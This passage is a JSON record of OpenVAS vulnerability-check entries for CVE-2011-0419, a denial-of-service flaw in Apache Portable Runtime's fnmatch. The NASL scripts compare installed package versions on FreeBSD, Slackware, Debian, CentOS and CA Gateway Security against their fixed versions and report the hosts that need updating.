\"ssh/login/freebsdrel\");\n\n script_tag(name:\"insight\", value:\"The following package is affected: apr0\n\nCVE-2011-0419\nStack consumption vulnerability in the fnmatch implementation in\napr_fnmatch.c in the Apache Portable Runtime (APR) library before\n1.4.3 and the Apache HTTP Server before 2.2.18, and in fnmatch.c in\nlibc in NetBSD 5.1, OpenBSD 4.8, FreeBSD, Apple Mac OS X 10.6, Oracle\nSolaris 10, and Android, allows context-dependent attackers to cause a\ndenial of service (CPU and memory consumption) via *? sequences in the\nfirst argument, as demonstrated by attacks against mod_autoindex in\nhttpd.\");\n\n script_tag(name:\"solution\", value:\"Update your system with the appropriate patches or\n software upgrades.\");\n\n script_xref(name:\"URL\", value:\"http://www.apache.org/dist/apr/Announcement0.9.html\");\n script_xref(name:\"URL\", value:\"http://www.vuxml.org/freebsd/38560d79-0e42-11e1-902b-20cf30e32f6d.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update to the system\n as announced in the referenced advisory.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-bsd.inc\");\n\nvuln = FALSE;\ntxt = \"\";\n\nbver = portver(pkg:\"apr0\");\nif(!isnull(bver) && revcomp(a:bver, b:\"0.9.20.0.9.19\")<0) {\n txt += 'Package apr0 version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = TRUE;\n}\n\nif(vuln) {\n security_message(data:txt);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:39:11", "description": "The remote host is missing an update as announced\nvia advisory SSA:2011-133-01.", "cvss3": {}, "published": "2012-09-10T00:00:00", "type": "openvas", "title": "Slackware Advisory SSA:2011-133-01 apr/apr-util", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-0419"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:136141256231071948", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231071948", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: esoft_slk_ssa_2011_133_01.nasl 14202 2019-03-15 09:16:15Z cfischer $\n# Description: Auto-generated from advisory SSA:2011-133-01\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.71948\");\n script_cve_id(\"CVE-2011-0419\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_version(\"$Revision: 14202 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 10:16:15 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-09-10 07:16:17 -0400 (Mon, 10 Sep 2012)\");\n script_name(\"Slackware Advisory SSA:2011-133-01 apr/apr-util\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Slackware Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/slackware_linux\", \"ssh/login/slackpack\", re:\"ssh/login/release=SLK(11\\.0|12\\.0|12\\.1|12\\.2|13\\.0|13\\.1|13\\.37)\");\n\n script_xref(name:\"URL\", value:\"https://secure1.securityspace.com/smysecure/catid.html?in=SSA:2011-133-01\");\n\n script_tag(name:\"insight\", value:\"New apr and apr-util packages are available for Slackware 11.0, 12.0, 12.1,\n12.2, 13.0, 13.1, 13.37, and -current to fix a security issue.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to the new package(s).\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update as announced\nvia advisory SSA:2011-133-01.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-slack.inc\");\n\nreport = \"\";\nres = \"\";\n\nif((res = isslkpkgvuln(pkg:\"apr\", ver:\"1.4.4-i486-1_slack11.0\", rls:\"SLK11.0\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"apr-util\", ver:\"1.3.11-i486-1_slack11.0\", rls:\"SLK11.0\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"apr\", ver:\"1.4.4-i486-1_slack12.0\", rls:\"SLK12.0\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"apr-util\", ver:\"1.3.11-i486-1_slack12.0\", rls:\"SLK12.0\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"apr\", ver:\"1.4.4-i486-1_slack12.1\", rls:\"SLK12.1\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"apr-util\", ver:\"1.3.11-i486-1_slack12.1\", rls:\"SLK12.1\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"apr\", ver:\"1.4.4-i486-1_slack12.2\", rls:\"SLK12.2\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"apr-util\", ver:\"1.3.11-i486-1_slack12.2\", rls:\"SLK12.2\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"apr\", ver:\"1.4.4-i486-1_slack13.0\", rls:\"SLK13.0\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"apr-util\", ver:\"1.3.11-i486-1_slack13.0\", rls:\"SLK13.0\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"apr\", ver:\"1.4.4-i486-1_slack13.1\", rls:\"SLK13.1\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"apr-util\", ver:\"1.3.11-i486-1_slack13.1\", rls:\"SLK13.1\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"apr\", ver:\"1.4.4-i486-1_slack13.37\", rls:\"SLK13.37\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"apr-util\", ver:\"1.3.11-i486-1_slack13.37\", rls:\"SLK13.37\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2017-09-04T14:19:54", "description": "This host is installed with CA Gateway Security and is prone to\n remote code execution Vulnerability.", "cvss3": {}, "published": "2011-11-15T00:00:00", "type": "openvas", "title": "CA Gateway Security Remote Code Execution Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-0419"], "modified": "2017-08-30T00:00:00", "id": "OPENVAS:802337", "href": "http://plugins.openvas.org/nasl.php?oid=802337", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ca_gateway_security_remote_code_execution_vuln.nasl 7024 2017-08-30 11:51:43Z teissa $\n#\n# CA Gateway Security Remote Code Execution Vulnerability\n#\n# Authors:\n# Rachana Shetty <srachana@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation could allow remote attackers to execute arbitrary\n code and cause Denial of Service.\n Impact Level: System/Application\";\ntag_affected = \"CA Gateway Security 8.1\";\ntag_insight = \"The flaw is due to an error in the Icihttp.exe module, which can be\n exploited by sending a specially-crafted HTTP request to TCP port 8080.\";\ntag_solution = \"Apply patch for CA Gateway Security r8.1\n https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID={5E404992-6B58-4C44-A29D-027D05B6285D}\";\ntag_summary = \"This host is installed with CA Gateway Security and is prone to\n remote code execution Vulnerability.\";\n\nif(description)\n{\n script_id(802337);\n script_version(\"$Revision: 7024 $\");\n script_cve_id(\"CVE-2011-0419\");\n script_bugtraq_id(48813);\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-08-30 13:51:43 +0200 (Wed, 30 Aug 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-11-15 12:35:07 +0530 (Tue, 15 Nov 2011)\");\n script_name(\"CA Gateway Security Remote Code Execution Vulnerability\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/45332\");\n script_xref(name : \"URL\" , value : \"http://securitytracker.com/id?1025812\");\n script_xref(name : \"URL\" , value : \"http://securitytracker.com/id?1025813\");\n script_xref(name : \"URL\" , value : \"http://xforce.iss.net/xforce/xfdb/68736\");\n script_xref(name : \"URL\" , value : \"https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID={5E404992-6B58-4C44-A29D-027D05B6285D}\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_dependencies(\"secpod_ca_mult_prdts_detect_win.nasl\");\n script_require_keys(\"CA/Gateway-Security/Win/Ver\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\n## Get version from KB\ncagsver = get_kb_item(\"CA/Gateway-Security/Win/Ver\");\nif(!cagsver){\n exit(0);\n}\n\n## Check for CA Gateway Security Version less than 8.1.0.69\nif(version_is_less(version:cagsver, test_version:\"8.1.0.69\")){\n security_message(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2020-04-27T19:22:42", "description": "This host is installed with CA Gateway Security and is prone to\n remote code execution Vulnerability.", "cvss3": {}, "published": "2011-11-15T00:00:00", "type": "openvas", "title": "CA Gateway Security Remote Code Execution Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-0419"], "modified": "2020-04-23T00:00:00", "id": "OPENVAS:1361412562310802337", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310802337", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CA Gateway Security Remote Code Execution Vulnerability\n#\n# Authors:\n# Rachana Shetty <srachana@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.802337\");\n script_version(\"2020-04-23T08:43:39+0000\");\n script_cve_id(\"CVE-2011-0419\");\n script_bugtraq_id(48813);\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-04-23 08:43:39 +0000 (Thu, 23 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2011-11-15 12:35:07 +0530 (Tue, 15 Nov 2011)\");\n script_name(\"CA Gateway Security Remote Code Execution Vulnerability\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/45332\");\n script_xref(name:\"URL\", value:\"http://securitytracker.com/id?1025812\");\n script_xref(name:\"URL\", value:\"http://securitytracker.com/id?1025813\");\n script_xref(name:\"URL\", value:\"http://xforce.iss.net/xforce/xfdb/68736\");\n script_xref(name:\"URL\", value:\"https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID={5E404992-6B58-4C44-A29D-027D05B6285D}\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n script_copyright(\"Copyright (C) 2011 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_dependencies(\"secpod_ca_mult_prdts_detect_win.nasl\");\n script_mandatory_keys(\"CA/Gateway-Security/Win/Ver\");\n script_tag(name:\"impact\", value:\"Successful exploitation could allow remote attackers to execute arbitrary\n code and cause Denial of Service.\");\n script_tag(name:\"affected\", value:\"CA Gateway Security 8.1\");\n script_tag(name:\"insight\", value:\"The flaw is due to an error in the Icihttp.exe module, which can be\n exploited by sending a specially-crafted HTTP request to TCP port 8080.\");\n script_tag(name:\"solution\", value:\"Apply patch for CA Gateway Security r8.1 from the linked references.\");\n script_tag(name:\"summary\", value:\"This host is installed with CA Gateway Security and is prone to\n remote code execution Vulnerability.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\ncagsver = get_kb_item(\"CA/Gateway-Security/Win/Ver\");\nif(!cagsver){\n exit(0);\n}\n\nif(version_is_less(version:cagsver, test_version:\"8.1.0.69\")){\n report = report_fixed_ver(installed_version:cagsver, fixed_version:\"8.1.0.69\");\n security_message(port: 0, data: report);\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2017-07-02T21:10:44", "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "cvss3": {}, "published": "2012-02-13T00:00:00", "type": "openvas", "title": "FreeBSD Ports: apr0", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-0419"], "modified": "2017-04-17T00:00:00", "id": "OPENVAS:70602", "href": "http://plugins.openvas.org/nasl.php?oid=70602", "sourceData": "#\n#VID 38560d79-0e42-11e1-902b-20cf30e32f6d\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from VID 38560d79-0e42-11e1-902b-20cf30e32f6d\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following package is affected: apr0\n\nCVE-2011-0419\nStack consumption vulnerability in the fnmatch implementation in\napr_fnmatch.c in the Apache Portable Runtime (APR) library before\n1.4.3 and the Apache HTTP Server before 2.2.18, and in fnmatch.c in\nlibc in NetBSD 5.1, OpenBSD 4.8, FreeBSD, Apple Mac OS X 10.6, Oracle\nSolaris 10, and Android, allows context-dependent attackers to cause a\ndenial of service (CPU and memory consumption) via *? sequences in the\nfirst argument, as demonstrated by attacks against mod_autoindex in\nhttpd.\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://www.apache.org/dist/apr/Announcement0.9.html\nhttp://www.vuxml.org/freebsd/38560d79-0e42-11e1-902b-20cf30e32f6d.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\n\nif(description)\n{\n script_id(70602);\n script_tag(name:\"creation_date\", value:\"2012-02-13 01:48:16 +0100 (Mon, 13 Feb 2012)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-04-17 11:02:19 +0200 (Mon, 17 Apr 2017) $\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_cve_id(\"CVE-2011-0419\");\n script_version(\"$Revision: 5958 $\");\n script_name(\"FreeBSD Ports: apr0\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"apr0\");\nif(!isnull(bver) && revcomp(a:bver, b:\"0.9.20.0.9.19\")<0) {\n txt += 'Package apr0 version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:55:25", "description": "The remote host is missing an update to apr\nannounced via advisory DSA 2237-1.", "cvss3": {}, "published": "2011-08-03T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 2237-1 (apr)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-0419"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:69734", "href": "http://plugins.openvas.org/nasl.php?oid=69734", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2237_1.nasl 6613 2017-07-07 12:08:40Z cfischer $\n# Description: Auto-generated from advisory DSA 2237-1 (apr)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2011 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A flaw was found in the APR library, which could be exploited through\nApache HTTPD's mod_autoindex. If a directory indexed by mod_autoindex\ncontained files with sufficiently long names, a remote attacker could\nsend a carefully crafted request which would cause excessive CPU\nusage. This could be used in a denial of service attack.\n\nFor the oldstable distribution (lenny), this problem has been fixed in\nversion 1.2.12-5+lenny3.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 1.4.2-6+squeeze1.\n\nFor the testing distribution (wheezy), this problem will be fixed in\nversion 1.4.4-1.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1.4.4-1.\n\nWe recommend that you upgrade your apr packages and restart the\";\ntag_summary = \"The remote host is missing an update to apr\nannounced via advisory DSA 2237-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%202237-1\";\n\n\nif(description)\n{\n script_id(69734);\n script_version(\"$Revision: 6613 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:08:40 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-08-03 04:36:20 +0200 (Wed, 03 Aug 2011)\");\n script_cve_id(\"CVE-2011-0419\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_name(\"Debian Security Advisory DSA 2237-1 (apr)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2011 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"libapr1\", ver:\"1.2.12-5+lenny3\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libapr1-dbg\", ver:\"1.2.12-5+lenny3\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libapr1-dev\", ver:\"1.2.12-5+lenny3\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libapr1\", ver:\"1.4.2-6+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libapr1-dbg\", ver:\"1.4.2-6+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libapr1-dev\", ver:\"1.4.2-6+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libapr1\", ver:\"1.4.4-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libapr1-dbg\", ver:\"1.4.4-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libapr1-dev\", ver:\"1.4.4-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-07-02T21:13:35", "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "cvss3": {}, "published": "2011-08-03T00:00:00", "type": "openvas", "title": "FreeBSD Ports: apr1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-0419"], "modified": "2017-02-25T00:00:00", "id": "OPENVAS:69767", "href": "http://plugins.openvas.org/nasl.php?oid=69767", "sourceData": "#\n#VID 00b296b6-7db1-11e0-96b7-00300582f9fc\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from VID 00b296b6-7db1-11e0-96b7-00300582f9fc\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2011 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following package is affected: apr1\n\nCVE-2011-0419\nStack consumption vulnerability in the fnmatch implementation in\napr_fnmatch.c in the Apache Portable Runtime (APR) library before\n1.4.3 and the Apache HTTP Server before 2.2.18, and in fnmatch.c in\nlibc in NetBSD 5.1, OpenBSD 4.8, FreeBSD, Apple Mac OS X 10.6, Oracle\nSolaris 10, and Android, allows context-dependent attackers to cause a\ndenial of service (CPU and memory consumption) via *? sequences in the\nfirst argument, as demonstrated by attacks against mod_autoindex in\nhttpd.\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://www.apache.org/dist/apr/Announcement1.x.html\nhttp://www.vuxml.org/freebsd/00b296b6-7db1-11e0-96b7-00300582f9fc.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\n\n\nif(description)\n{\n script_id(69767);\n script_version(\"$Revision: 5424 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-25 17:52:36 +0100 (Sat, 25 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-08-03 04:36:20 +0200 (Wed, 03 Aug 2011)\");\n script_cve_id(\"CVE-2011-0419\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_name(\"FreeBSD Ports: apr1\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2011 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"apr1\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.4.4.1.3.11\")<0) {\n txt += 'Package apr1 version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-07-25T10:55:19", "description": "Check for the Version of apr", "cvss3": {}, "published": "2011-08-09T00:00:00", "type": "openvas", "title": "CentOS Update for apr CESA-2011:0507 centos5 i386", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-0419"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:880541", "href": "http://plugins.openvas.org/nasl.php?oid=880541", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for apr CESA-2011:0507 centos5 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The Apache Portable Runtime (APR) is a portability library used by the\n Apache HTTP Server and other projects. It provides a free library of C data\n structures and routines.\n\n It was discovered that the apr_fnmatch() function used an unconstrained\n recursion when processing patterns with the '*' wildcard. An attacker could\n use this flaw to cause an application using this function, which also\n accepted untrusted input as a pattern for matching (such as an httpd server\n using the mod_autoindex module), to exhaust all stack memory or use an\n excessive amount of CPU time when performing matching. (CVE-2011-0419)\n \n Red Hat would like to thank Maksymilian 